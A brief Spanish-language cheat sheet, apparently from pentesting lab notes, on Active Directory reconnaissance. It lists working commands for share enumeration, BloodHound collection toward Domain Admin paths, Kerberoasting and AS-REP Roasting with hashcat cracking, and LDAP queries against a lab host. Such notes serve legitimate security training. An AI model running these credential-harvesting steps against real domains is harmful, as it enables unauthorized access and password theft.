Active Directory
Enumeración de Active Directory
Reconocimiento de un dominio AD — enumeración con BloodHound, Kerberoasting, AS-REP Roasting y consultas LDAP.
1 min de lectura
Enumeración inicial
Con credenciales de bajo privilegio:
crackmapexec smb 10.10.10.10 -u user -p pass --shares
enum4linux-ng -A 10.10.10.10BloodHound
Recolecta datos del dominio para encontrar rutas de ataque:
bloodhound-python -u user -p pass -d dominio.htb -ns 10.10.10.10 -c allImporta el resultado en BloodHound y busca Shortest Path to Domain Admins.
Kerberoasting
Solicita tickets de servicio (SPN) y crackéalos offline:
GetUserSPNs.py dominio.htb/user:pass -dc-ip 10.10.10.10 -request
hashcat -m 13100 hashes.txt rockyou.txtAS-REP Roasting
Usuarios sin pre-autenticación Kerberos:
GetNPUsers.py dominio.htb/ -usersfile users.txt -no-pass -dc-ip 10.10.10.10
hashcat -m 18200 hashes.txt rockyou.txtConsultas LDAP
ldapsearch -x -H ldap://10.10.10.10 -b "DC=dominio,DC=htb"